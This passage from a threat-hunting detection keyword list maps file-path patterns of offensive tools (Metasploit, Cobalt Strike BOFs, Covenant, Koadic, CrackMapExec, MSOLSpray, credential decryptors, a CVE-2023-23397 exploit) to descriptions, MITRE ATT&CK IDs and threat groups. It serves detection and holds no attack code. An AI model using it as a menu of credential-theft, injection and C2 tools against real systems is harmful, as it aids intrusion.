Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*/mirai_pass.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Misc/donut.exe*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,1,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*/mitmAP*,offensive_tool_keyword,mitmAP,A python program to create a fake AP and sniff data,T1563 - T1593 - T1594 - T1567,TA0002 - TA0007 - TA0009 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/xdavidhu/mitmAP,1,1,N/A,N/A,10,1619,282,2019-11-03T11:34:06Z,2016-10-22T21:49:25Z 
-*/mmouse-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mmouse-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Mockingjay_BOF.git*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique,T1055.012 - T1059.001 - T1027.002,TA0002 - TA0005,N/A,N/A,C2,https://github.com/ewby/Mockingjay_BOF,1,1,N/A,9,10,32,7,2023-08-27T14:09:39Z,2023-08-27T06:01:28Z -*/modbus-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Models/PowerShellLauncher.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Models/Regsvr32Launcher.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Models/ShellCodeLauncher.*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*/Modlishka.git*,offensive_tool_keyword,Modlishka ,Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.,T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002,TA0011 - TA0001 - TA0002 - TA0005 - TA0040,N/A,N/A,Network Exploitation Tools,https://github.com/drk1wi/Modlishka,1,1,N/A,5,10,4434,854,2023-04-10T07:30:13Z,2018-12-19T15:59:54Z -*/module/darkexe/*,offensive_tool_keyword,FourEye,AV Evasion Tool,T1059 - T1059.001 - T1059.005 - T1027 - T1027.005,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/lengjibo/FourEye,1,0,N/A,10,8,724,154,2021-12-08T11:55:15Z,2020-12-11T01:29:58Z -*/Modules/Exitservice/uinit.exe*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/modules/payload/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/mongodb-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mongodb-databases.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mongodb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/monkey.py,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/monkey_island.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/MonkeyWorks.git*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,1,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*/mouselogger.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/mqtt-subscribe.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mRemoteNG-Decrypt*,offensive_tool_keyword,mRemoteNG-Decrypt,Python script to decrypt passwords stored by mRemoteNG,T1589 T1003 T1563 T1552 T1098 T1021,N/A,N/A,N/A,Credential Access,https://github.com/haseebT/mRemoteNG-Decrypt,1,1,N/A,N/A,2,111,39,2023-07-06T16:15:20Z,2019-05-27T05:25:57Z -*/mrinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Mr-Un1k0d3r/*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*/Mr-xn/cve-2022-23131*,offensive_tool_keyword,POC,POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML),T1548 - T1190,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/cve-2022-23131,1,1,N/A,N/A,2,146,48,2022-02-24T15:02:12Z,2022-02-18T11:51:47Z -*/MS15-034.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts,1,1,N/A,N/A,10,920,383,2022-01-22T18:40:30Z,2011-05-31T05:41:49Z -*/msf.go,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/msf.swf*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msfcrawler*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msfpc.sh*,offensive_tool_keyword,msfpc,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1027 - T1036 - T1564 - T1071 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/g0tmi1k/msfpc,1,1,N/A,N/A,10,1127,274,2021-05-09T13:16:07Z,2015-06-22T12:58:04Z -*/msftest/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msfvenom/*,offensive_tool_keyword,msfvenom,Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.,T1059.001 - T1027 - T1210.001 - T1204.002,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/msf-ws.log*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/MsgKitTestTool/*,offensive_tool_keyword,poc,Exploit for the CVE-2023-23397,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY,1,1,N/A,N/A,2,158,46,2023-03-15T17:53:53Z,2023-03-15T17:03:38Z -*/Mshikaki.git*,offensive_tool_keyword,Mshikaki,A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption,T1055.012 - T1116 - T1027.002 - T1562.001,TA0005 - TA0006 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/trevorsaudi/Mshikaki,1,1,N/A,9,2,103,21,2023-09-29T19:23:40Z,2023-09-03T16:35:50Z -*/mshta.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/mshtajs.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/msLDAPDump*,offensive_tool_keyword,msldapdump,LDAP enumeration tool implemented in Python3,T1018 - T1210.001,TA0007 - TA0001,N/A,N/A,Reconnaissance,https://github.com/dievus/msLDAPDump,1,1,N/A,N/A,3,205,27,2023-08-14T13:15:29Z,2022-12-30T23:35:40Z -*/MSOLSpray*,offensive_tool_keyword,MSOLSpray,This module will perform password spraying against Microsoft Online accounts (Azure/O365),T1110.003 - T1553.003,TA0001 - TA0006,N/A,N/A,Network Exploitation tools,https://github.com/dafthack/MSOLSpray,1,1,N/A,10,8,734,147,2023-02-17T13:52:21Z,2020-03-16T13:38:22Z -*/msrpc-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-dac.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-dump-hashes.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-empty-password.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mssqlexec.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/ms-sql-hasdbaccess.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mssqlproxy.git*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*/ms-sql-query.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-tables.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ms-sql-xp-cmdshell.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mtrace.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
